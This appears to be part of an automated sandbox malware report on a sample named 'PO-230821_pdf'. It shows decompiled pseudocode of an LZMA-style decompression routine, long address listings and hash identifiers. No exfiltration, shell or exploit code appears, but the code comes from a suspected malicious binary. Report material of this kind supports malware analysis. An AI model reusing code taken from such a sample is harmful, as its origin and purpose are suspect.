                                            													__eflags =  *(__ebp - 0x64);
                                            													if( *(__ebp - 0x64) == 0) {
                                            														break;
                                            													}
                                            													__eax =  *(__ebp - 0x14);
                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            													__eflags = __eax -  *(__ebp - 0x74);
                                            													if(__eax >=  *(__ebp - 0x74)) {
                                            														__eax = __eax +  *(__ebp - 0x74);
                                            														__eflags = __eax;
                                            													}
                                            													__edx =  *(__ebp - 8);
                                            													__cl =  *(__eax + __edx);
                                            													__eax =  *(__ebp - 0x14);
                                            													 *(__ebp - 0x5c) = __cl;
                                            													 *(__eax + __edx) = __cl;
                                            													__eax = __eax + 1;
                                            													__edx = 0;
                                            													_t414 = __eax %  *(__ebp - 0x74);
                                            													__eax = __eax /  *(__ebp - 0x74);
                                            													__edx = _t414;
                                            													__eax =  *(__ebp - 0x68);
                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            													__eflags =  *(__ebp - 0x30);
                                            													 *( *(__ebp - 0x68)) = __cl;
                                            													 *(__ebp - 0x14) = _t414;
                                            													if( *(__ebp - 0x30) > 0) {
                                            														continue;
                                            													} else {
                                            														L81:
                                            														 *(__ebp - 0x88) = 2;
                                            														goto L1;
                                            													}
                                            												}
                                            												 *(__ebp - 0x88) = 0x1c;
                                            												goto L170;
                                            										}
                                            									}
                                            									L171:
                                            									_t535 = _t534 | 0xffffffff;
                                            									goto L172;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					goto L1;
                                            				}
                                            			}













                                            0x00000000
                                            0x0040711c
                                            0x0040711c
                                            0x00407120
                                            0x0040712d
                                            0x00407137
                                            0x00000000
                                            0x00407122
                                            0x00407122
                                            0x0040715d
                                            0x00407160
                                            0x00407163
                                            0x00407166
                                            0x00407166
                                            0x00407169
                                            0x00407170
                                            0x00407175
                                            0x00407056
                                            0x00407059
                                            0x004073cb
                                            0x004073cb
                                            0x004073cb
                                            0x004073ce
                                            0x004073ce
                                            0x004073ce
                                            0x004073d4
                                            0x004073da
                                            0x004073e0
                                            0x004073fa
                                            0x004073fd
                                            0x00407403
                                            0x0040740e
                                            0x00407410
                                            0x004073e2
                                            0x004073e2
                                            0x004073f1
                                            0x004073f5
                                            0x004073f5
                                            0x0040741a
                                            0x00000000
                                            0x00000000
                                            0x0040741c
                                            0x00407420
                                            0x004075cf
                                            0x004075e5
                                            0x004075ed
                                            0x004075f4
                                            0x004075f6
                                            0x004075fd
                                            0x00407601
                                            0x00407601
                                            0x0040742c
                                            0x00407433
                                            0x0040743b
                                            0x0040743e
                                            0x00407441
                                            0x00407441
                                            0x00407447
                                            0x00407447
                                            0x00406be3
                                            0x00406be3
                                            0x00406be3
                                            0x00406bec
                                            0x00000000
                                            0x00000000
                                            0x00406bf2
                                            0x00000000
                                            0x00406bfd
                                            0x00000000
                                            0x00000000
                                            0x00406c06
                                            0x00406c09
                                            0x00406c0c
                                            0x00406c10
                                            0x00000000
                                            0x00000000
                                            0x00406c16
                                            0x00406c19
                                            0x00406c1b
                                            0x00406c1c
                                            0x00406c1f
                                            0x00406c21
                                            0x00406c22
                                            0x00406c24
                                            0x00406c27
                                            0x00406c2c
                                            0x00406c31
                                            0x00406c3a
                                            0x00406c4d
                                            0x00406c50
                                            0x00406c5c
                                            0x00406c84
                                            0x00406c86
                                            0x00406c94
                                            0x00406c94
                                            0x00406c98
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406c88
                                            0x00406c88
                                            0x00406c8b
                                            0x00406c8c
                                            0x00406c8c
                                            0x00000000
                                            0x00406c88
                                            0x00406c62
                                            0x00406c67
                                            0x00406c67
                                            0x00406c70
                                            0x00406c78
                                            0x00406c7b
                                            0x00000000
                                            0x00406c81
                                            0x00406c81
                                            0x00000000
                                            0x00406c81
                                            0x00000000
                                            0x00406c9e
                                            0x00406c9e
                                            0x00406ca2
                                            0x0040754e
                                            0x00000000
                                            0x0040754e
                                            0x00406cab
                                            0x00406cbb
                                            0x00406cbe
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc4
                                            0x00406cc8
                                            0x00000000
                                            0x00000000
                                            0x00406cca
                                            0x00406cd0
                                            0x00406cfa
                                            0x00406d00
                                            0x00406d07
                                            0x00000000
                                            0x00406d07
                                            0x00406cd6
                                            0x00406cd9
                                            0x00406cde
                                            0x00406cde
                                            0x00406ce9
                                            0x00406cf1
                                            0x00406cf4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d39
                                            0x00406d3f
                                            0x00406d42
                                            0x00406d4f
                                            0x00406d57
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x00000000
                                            0x00406d0e
                                            0x00406d0e
                                            0x00406d12
                                            0x0040755d
                                            0x00000000
                                            0x0040755d
                                            0x00406d1e
                                            0x00406d29
                                            0x00406d29
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d32
                                            0x00406d37
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004073ce
                                            0x004073ce
                                            0x004073d4
                                            0x004073da
                                            0x004073e0
                                            0x004073fa
                                            0x004073fd
                                            0x00407403
                                            0x0040740e
                                            0x00407410
                                            0x004073e2
                                            0x004073e2
                                            0x004073f1
                                            0x004073f5
                                            0x004073f5
                                            0x0040741a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d5f
                                            0x00406d61
                                            0x00406d64
                                            0x00406dd5
                                            0x00406dd8
                                            0x00406ddb
                                            0x00406de2
                                            0x00406dec
                                            0x004073cb
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x004073cb
                                            0x00406d66
                                            0x00406d6a
                                            0x00406d6d
                                            0x00406d6f
                                            0x00406d72
                                            0x00406d75
                                            0x00406d77
                                            0x00406d7a
                                            0x00406d7c
                                            0x00406d81
                                            0x00406d84
                                            0x00406d87
                                            0x00406d8b
                                            0x00406d92
                                            0x00406d95
                                            0x00406d9c
                                            0x00406da0
                                            0x00406da8
                                            0x00406da8
                                            0x00406da8
                                            0x00406da2
                                            0x00406da2
                                            0x00406da2
                                            0x00406d97
                                            0x00406d97
                                            0x00406d97
                                            0x00406dac
                                            0x00406daf
                                            0x00406dcd
                                            0x00406dcf
                                            0x00000000
                                            0x00406db1
                                            0x00406db1
                                            0x00406db4
                                            0x00406db7
                                            0x00406dba
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbf
                                            0x00406dc2
                                            0x00406dc4
                                            0x00406dc5
                                            0x00406dc8
                                            0x00000000
                                            0x00406dc8
                                            0x00000000
                                            0x00406ffe
                                            0x00407002
                                            0x00407020
                                            0x00407023
                                            0x0040702a
                                            0x0040702d
                                            0x00407030
                                            0x00407033
                                            0x00407036
                                            0x00407039
                                            0x0040703b
                                            0x00407042
                                            0x00407043
                                            0x00407045
                                            0x00407048
                                            0x0040704b
                                            0x0040704e
                                            0x0040704e
                                            0x00407053
                                            0x00000000
                                            0x00407053
                                            0x00407004
                                            0x00407007
                                            0x0040700a
                                            0x00407014
                                            0x004073cb
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x00000000
                                            0x00407068
                                            0x0040706c
                                            0x0040708f
                                            0x00407092
                                            0x00407095
                                            0x0040709f
                                            0x0040706e
                                            0x0040706e
                                            0x00407071
                                            0x00407074
                                            0x00407077
                                            0x00407084
                                            0x00407087
                                            0x00407087
                                            0x004073cb
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x00000000
                                            0x004070ab
                                            0x004070af
                                            0x00000000
                                            0x00000000
                                            0x004070b5
                                            0x004070b9
                                            0x00000000
                                            0x00000000
                                            0x004070bf
                                            0x004070c1
                                            0x004070c5
                                            0x004070c5
                                            0x004070c8
                                            0x004070cc
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00407143
                                            0x00407147
                                            0x0040714e
                                            0x00407151
                                            0x00407154
                                            0x00407149
                                            0x00407149
                                            0x00407149
                                            0x00407157
                                            0x0040715a
                                            0x00000000
                                            0x00000000
                                            0x00407203
                                            0x00407203
                                            0x00407207
                                            0x004075a5
                                            0x00000000
                                            0x004075a5
                                            0x0040720d
                                            0x00407210
                                            0x00407213
                                            0x00407217
                                            0x0040721a
                                            0x00407220
                                            0x00407222
                                            0x00407222
                                            0x00407222
                                            0x00407225
                                            0x00407228
                                            0x00000000
                                            0x00000000
                                            0x00406df8
                                            0x00406df8
                                            0x00406dfc
                                            0x00407569
                                            0x00000000
                                            0x00407569
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0c
                                            0x00406e0f
                                            0x00406e15
                                            0x00406e17
                                            0x00406e17
                                            0x00406e17
                                            0x00406e1a
                                            0x00406e1d
                                            0x00406e1d
                                            0x00406e20
                                            0x00406e23
                                            0x00000000
                                            0x00000000
                                            0x00406e29
                                            0x00406e2f
                                            0x00000000
                                            0x00000000
                                            0x00406e35
                                            0x00406e35
                                            0x00406e39
                                            0x00406e3c
                                            0x00406e3f
                                            0x00406e42
                                            0x00406e45
                                            0x00406e46
                                            0x00406e49
                                            0x00406e4b
                                            0x00406e51
                                            0x00406e54
                                            0x00406e57
                                            0x00406e5a
                                            0x00406e5d
                                            0x00406e60
                                            0x00406e63
                                            0x00406e7f
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8f
                                            0x00406e93
                                            0x00406e95
                                            0x00406e99
                                            0x00406e65
                                            0x00406e65
                                            0x00406e69
                                            0x00406e71
                                            0x00406e76
                                            0x00406e78
                                            0x00406e7a
                                            0x00406e7a
                                            0x00406e9c
                                            0x00406ea3
                                            0x00406ea6
                                            0x00000000
                                            0x00406eac
                                            0x00000000
                                            0x00406eac
                                            0x00000000
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406eb5
                                            0x00407575
                                            0x00000000
                                            0x00407575
                                            0x00406ebb
                                            0x00406ebe
                                            0x00406ec1
                                            0x00406ec5
                                            0x00406ec8
                                            0x00406ece
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed3
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406edc
                                            0x00000000
                                            0x00000000
                                            0x00406ede
                                            0x00406ee1
                                            0x00406ee4
                                            0x00406ee7
                                            0x00406eea
                                            0x00406eed
                                            0x00406ef0
                                            0x00406ef3
                                            0x00406ef6
                                            0x00406ef9
                                            0x00406efc
                                            0x00406f14
                                            0x00406f17
                                            0x00406f1a
                                            0x00406f1d
                                            0x00406f1d
                                            0x00406f20
                                            0x00406f24
                                            0x00406f26
                                            0x00406efe
                                            0x00406efe
                                            0x00406f06
                                            0x00406f0b
                                            0x00406f0d
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f29
                                            0x00406f30
                                            0x00406f33
                                            0x00000000
                                            0x00406f35
                                            0x00000000
                                            0x00406f35
                                            0x00406f33
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00000000
                                            0x00000000
                                            0x00406f75
                                            0x00406f75
                                            0x00406f79
                                            0x00407581
                                            0x00000000
                                            0x00407581
                                            0x00406f7f
                                            0x00406f82
                                            0x00406f85
                                            0x00406f89
                                            0x00406f8c
                                            0x00406f92
                                            0x00406f94
                                            0x00406f94
                                            0x00406f94
                                            0x00406f97
                                            0x00406f9a
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406f3e
                                            0x00406f3e
                                            0x00406f41
                                            0x00000000
                                            0x00406f41
                                            0x00406fa2
                                            0x00406fa2
                                            0x00406fa5
                                            0x00406fa8
                                            0x00406fab
                                            0x00406fae
                                            0x00406fb1
                                            0x00406fb4
                                            0x00406fb7
                                            0x00406fba
                                            0x00406fbd
                                            0x00406fc0
                                            0x00406fd8
                                            0x00406fdb
                                            0x00406fde
                                            0x00406fe1
                                            0x00406fe1
                                            0x00406fe4
                                            0x00406fe8
                                            0x00406fea
                                            0x00406fc2
                                            0x00406fc2
                                            0x00406fca
                                            0x00406fcf
                                            0x00406fd1
                                            0x00406fd3
                                            0x00406fd3
                                            0x00406fed
                                            0x00406ff4
                                            0x00406ff7
                                            0x00000000
                                            0x00406ff9
                                            0x00000000
                                            0x00406ff9
                                            0x00000000
                                            0x00407286
                                            0x00407286
                                            0x0040728a
                                            0x004075b1
                                            0x00000000
                                            0x004075b1
                                            0x00407290
                                            0x00407293
                                            0x00407296
                                            0x0040729a
                                            0x0040729d
                                            0x004072a3
                                            0x004072a5
                                            0x004072a5
                                            0x004072a5
                                            0x004072a8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00407395
                                            0x00407399
                                            0x004073bb
                                            0x004073be
                                            0x004073c8
                                            0x004073cb
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x004073cb
                                            0x0040739b
                                            0x0040739e
                                            0x004073a2
                                            0x004073a5
                                            0x004073a5
                                            0x004073a8
                                            0x00000000
                                            0x00000000
                                            0x00407452
                                            0x00407456
                                            0x00407474
                                            0x00407474
                                            0x00407474
                                            0x0040747b
                                            0x00407482
                                            0x00407489
                                            0x00407489
                                            0x00000000
                                            0x00407489
                                            0x00407458
                                            0x0040745b
                                            0x0040745e
                                            0x00407461
                                            0x00407468
                                            0x004073ac
                                            0x004073ac
                                            0x004073af
                                            0x00000000
                                            0x00000000
                                            0x00407543
                                            0x00407546
                                            0x00407447
                                            0x00000000
                                            0x00000000
                                            0x0040717d
                                            0x0040717f
                                            0x00407186
                                            0x00407187
                                            0x00407189
                                            0x0040718c
                                            0x00000000
                                            0x00000000
                                            0x00407194
                                            0x00407197
                                            0x0040719a
                                            0x0040719c
                                            0x0040719e
                                            0x0040719e
                                            0x0040719f
                                            0x004071a2
                                            0x004071a9
                                            0x004071ac
                                            0x004071ba
                                            0x00000000
                                            0x00000000
                                            0x00407490
                                            0x00407490
                                            0x00407493
                                            0x0040749a
                                            0x00000000
                                            0x00000000
                                            0x0040749f
                                            0x0040749f
                                            0x004074a3
                                            0x004075db
                                            0x00000000
                                            0x004075db
                                            0x004074a9
                                            0x004074ac
                                            0x004074af
                                            0x004074b3
                                            0x004074b6
                                            0x004074bc
                                            0x004074be
                                            0x004074be
                                            0x004074be
                                            0x004074c1
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c7
                                            0x004074c7
                                            0x004074cb
                                            0x0040752b
                                            0x0040752e
                                            0x00407533
                                            0x00407534
                                            0x00407536
                                            0x00407538
                                            0x0040753b
                                            0x00407447
                                            0x00407447
                                            0x00000000
                                            0x0040744d
                                            0x00407447
                                            0x004074cd
                                            0x004074d3
                                            0x004074d6
                                            0x004074d9
                                            0x004074dc
                                            0x004074df
                                            0x004074e2
                                            0x004074e5
                                            0x004074e8
                                            0x004074eb
                                            0x004074ee
                                            0x00407507
                                            0x0040750a
                                            0x0040750d
                                            0x00407510
                                            0x00407514
                                            0x00407516
                                            0x00407516
                                            0x00407517
                                            0x0040751a
                                            0x004074f0
                                            0x004074f0
                                            0x004074f8
                                            0x004074fd
                                            0x004074ff
                                            0x00407502
                                            0x00407502
                                            0x0040751d
                                            0x00407524
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x004071c2
                                            0x004071c5
                                            0x004071fb
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732e
                                            0x0040732e
                                            0x00407331
                                            0x00407333
                                            0x004075bd
                                            0x00000000
                                            0x004075bd
                                            0x00407339
                                            0x0040733c
                                            0x00000000
                                            0x00000000
                                            0x00407342
                                            0x00407346
                                            0x00407349
                                            0x00407349
                                            0x00407349
                                            0x00000000
                                            0x00407349
                                            0x004071c7
                                            0x004071c9
                                            0x004071cb
                                            0x004071cd
                                            0x004071d0
                                            0x004071d1
                                            0x004071d3
                                            0x004071d5
                                            0x004071d8
                                            0x004071db
                                            0x004071f1
                                            0x004071f6
                                            0x0040722e
                                            0x0040722e
                                            0x00407232
                                            0x0040725e
                                            0x00407260
                                            0x00407267
                                            0x0040726a
                                            0x0040726d
                                            0x0040726d
                                            0x00407272
                                            0x00407272
                                            0x00407274
                                            0x00407277
                                            0x0040727e
                                            0x00407281
                                            0x004072ae
                                            0x004072ae
                                            0x004072b1
                                            0x004072b4
                                            0x00407328
                                            0x00407328
                                            0x00407328
                                            0x00000000
                                            0x00407328
                                            0x004072b6
                                            0x004072bc
                                            0x004072bf
                                            0x004072c2
                                            0x004072c5
                                            0x004072c8
                                            0x004072cb
                                            0x004072ce
                                            0x004072d1
                                            0x004072d4
                                            0x004072d7
                                            0x004072f0
                                            0x004072f2
                                            0x004072f5
                                            0x004072f6
                                            0x004072f9
                                            0x004072fb
                                            0x004072fe
                                            0x00407300
                                            0x00407302
                                            0x00407305
                                            0x00407307
                                            0x0040730a
                                            0x0040730e
                                            0x00407310
                                            0x00407310
                                            0x00407311
                                            0x00407314
                                            0x00407317
                                            0x004072d9
                                            0x004072d9
                                            0x004072e1
                                            0x004072e6
                                            0x004072e8
                                            0x004072eb
                                            0x004072eb
                                            0x0040731a
                                            0x00407321
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x00000000
                                            0x00407323
                                            0x00000000
                                            0x00407323
                                            0x00407321
                                            0x00407234
                                            0x00407237
                                            0x00407239
                                            0x0040723c
                                            0x0040723f
                                            0x00407242
                                            0x00407244
                                            0x00407247
                                            0x0040724a
                                            0x0040724a
                                            0x0040724d
                                            0x0040724d
                                            0x00407250
                                            0x00407257
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x00000000
                                            0x00407259
                                            0x00000000
                                            0x00407259
                                            0x00407257
                                            0x004071dd
                                            0x004071e0
                                            0x004071e2
                                            0x004071e5
                                            0x00000000
                                            0x00000000
                                            0x00406f44
                                            0x00406f44
                                            0x00406f48
                                            0x0040758d
                                            0x00000000
                                            0x0040758d
                                            0x00406f4e
                                            0x00406f51
                                            0x00406f54
                                            0x00406f57
                                            0x00406f5a
                                            0x00406f5d
                                            0x00406f60
                                            0x00406f62
                                            0x00406f65
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6d
                                            0x00406f6d
                                            0x00406f6d
                                            0x00000000
                                            0x00000000
                                            0x004070cf
                                            0x004070cf
                                            0x004070d3
                                            0x00407599
                                            0x00000000
                                            0x00407599
                                            0x004070d9
                                            0x004070dc
                                            0x004070df
                                            0x004070e2
                                            0x004070e4
                                            0x004070e4
                                            0x004070e4
                                            0x004070e7
                                            0x004070ea
                                            0x004070ed
                                            0x004070f0
                                            0x004070f3
                                            0x004070f6
                                            0x004070f7
                                            0x004070f9
                                            0x004070f9
                                            0x004070f9
                                            0x004070fc
                                            0x004070ff
                                            0x00407102
                                            0x00407105
                                            0x00407105
                                            0x00407105
                                            0x00407108
                                            0x0040710a
                                            0x0040710a
                                            0x00000000
                                            0x00000000
                                            0x0040734c
                                            0x0040734c
                                            0x0040734c
                                            0x00407350
                                            0x00000000
                                            0x00000000
                                            0x00407356
                                            0x00407359
                                            0x0040735c
                                            0x0040735f
                                            0x00407361
                                            0x00407361
                                            0x00407361
                                            0x00407364
                                            0x00407367
                                            0x0040736a
                                            0x0040736d
                                            0x00407370
                                            0x00407373
                                            0x00407374
                                            0x00407376
                                            0x00407376
                                            0x00407376
                                            0x00407379
                                            0x0040737c
                                            0x0040737f
                                            0x00407382
                                            0x00407385
                                            0x00407389
                                            0x0040738b
                                            0x0040738e
                                            0x00000000
                                            0x00407390
                                            0x0040710d
                                            0x0040710d
                                            0x00000000
                                            0x0040710d
                                            0x0040738e
                                            0x004075c3
                                            0x00000000
                                            0x00000000
                                            0x00406bf2
                                            0x004075fa
                                            0x004075fa
                                            0x00000000
                                            0x004075fa
                                            0x00407447
                                            0x004073ce
                                            0x004073cb
                                            0x00000000
                                            0x00407120

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                            • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                            • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                            • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E00407068() {
                                            				unsigned short _t531;
                                            				signed int _t532;
                                            				void _t533;
                                            				signed int _t534;
                                            				signed int _t535;
                                            				signed int _t565;
                                            				signed int _t568;
                                            				signed int _t589;
                                            				signed int* _t606;
                                            				void* _t613;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					if( *(_t613 - 0x40) != 0) {
                                            						 *(_t613 - 0x84) = 0xa;
                                            						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                            					} else {
                                            						 *(__ebp - 0x84) = 9;
                                            						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            					}
                                            					while(1) {
                                            						 *(_t613 - 0x54) = _t606;
                                            						while(1) {
                                            							L133:
                                            							_t531 =  *_t606;
                                            							_t589 = _t531 & 0x0000ffff;
                                            							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                            							if( *(_t613 - 0xc) >= _t565) {
                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                            								 *(_t613 - 0x40) = 1;
                                            								_t532 = _t531 - (_t531 >> 5);
                                            								 *_t606 = _t532;
                                            							} else {
                                            								 *(_t613 - 0x10) = _t565;
                                            								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                            							}
                                            							if( *(_t613 - 0x10) >= 0x1000000) {
                                            								goto L139;
                                            							}
                                            							L137:
                                            							if( *(_t613 - 0x6c) == 0) {
                                            								 *(_t613 - 0x88) = 5;
                                            								L170:
                                            								_t568 = 0x22;
                                            								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                            								_t535 = 0;
                                            								L172:
                                            								return _t535;
                                            							}
                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                            							L139:
                                            							_t533 =  *(_t613 - 0x84);
                                            							while(1) {
                                            								 *(_t613 - 0x88) = _t533;
                                            								while(1) {
                                            									L1:
                                            									_t534 =  *(_t613 - 0x88);
                                            									if(_t534 > 0x1c) {
                                            										break;
                                            									}
                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                            										case 0:
                                            											if( *(_t613 - 0x6c) == 0) {
                                            												goto L170;
                                            											}
                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            											_t534 =  *( *(_t613 - 0x70));
                                            											if(_t534 > 0xe1) {
                                            												goto L171;
                                            											}
                                            											_t538 = _t534 & 0x000000ff;
                                            											_push(0x2d);
                                            											asm("cdq");
                                            											_pop(_t570);
                                            											_push(9);
                                            											_pop(_t571);
                                            											_t609 = _t538 / _t570;
                                            											_t540 = _t538 % _t570 & 0x000000ff;
                                            											asm("cdq");
                                            											_t604 = _t540 % _t571 & 0x000000ff;
                                            											 *(_t613 - 0x3c) = _t604;
                                            											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                            											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                            											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                            											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                            												L10:
                                            												if(_t612 == 0) {
                                            													L12:
                                            													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            													goto L15;
                                            												} else {
                                            													goto L11;
                                            												}
                                            												do {
                                            													L11:
                                            													_t612 = _t612 - 1;
                                            													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                            												} while (_t612 != 0);
                                            												goto L12;
                                            											}
                                            											if( *(_t613 - 4) != 0) {
                                            												GlobalFree( *(_t613 - 4));
                                            											}
                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                            											 *(_t613 - 4) = _t534;
                                            											if(_t534 == 0) {
                                            												goto L171;
                                            											} else {
                                            												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                            												goto L10;
                                            											}
                                            										case 1:
                                            											L13:
                                            											__eflags =  *(_t613 - 0x6c);
                                            											if( *(_t613 - 0x6c) == 0) {
                                            												 *(_t613 - 0x88) = 1;
                                            												goto L170;
                                            											}
                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            											_t45 = _t613 - 0x48;
                                            											 *_t45 =  *(_t613 - 0x48) + 1;
                                            											__eflags =  *_t45;
                                            											L15:
                                            											if( *(_t613 - 0x48) < 4) {
                                            												goto L13;
                                            											}
                                            											_t546 =  *(_t613 - 0x40);
                                            											if(_t546 ==  *(_t613 - 0x74)) {
                                            												L20:
                                            												 *(_t613 - 0x48) = 5;
                                            												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                            												goto L23;
                                            											}
                                            											 *(_t613 - 0x74) = _t546;
                                            											if( *(_t613 - 8) != 0) {
                                            												GlobalFree( *(_t613 - 8));
                                            											}
                                            											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                            											 *(_t613 - 8) = _t534;
                                            											if(_t534 == 0) {
                                            												goto L171;
                                            											} else {
                                            												goto L20;
                                            											}
                                            										case 2:
                                            											L24:
                                            											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                            											 *(_t613 - 0x84) = 6;
                                            											 *(_t613 - 0x4c) = _t553;
                                            											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                            											 *(_t613 - 0x54) = _t606;
                                            											goto L133;
                                            										case 3:
                                            											L21:
                                            											__eflags =  *(_t613 - 0x6c);
                                            											if( *(_t613 - 0x6c) == 0) {
                                            												 *(_t613 - 0x88) = 3;
                                            												goto L170;
                                            											}
                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            											_t67 = _t613 - 0x70;
                                            											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                            											__eflags =  *_t67;
                                            											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                            											L23:
                                            											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                            											if( *(_t613 - 0x48) != 0) {
                                            												goto L21;
                                            											}
                                            											goto L24;
                                            										case 4:
                                            											L133:
                                            											_t531 =  *_t606;
                                            											_t589 = _t531 & 0x0000ffff;
                                            											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                            											if( *(_t613 - 0xc) >= _t565) {
                                            												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                            												 *(_t613 - 0x40) = 1;
                                            												_t532 = _t531 - (_t531 >> 5);
                                            												 *_t606 = _t532;
                                            											} else {
                                            												 *(_t613 - 0x10) = _t565;
                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                            											}
                                            											if( *(_t613 - 0x10) >= 0x1000000) {
                                            												goto L139;
                                            											}
                                            										case 5:
                                            											goto L137;
                                            										case 6:
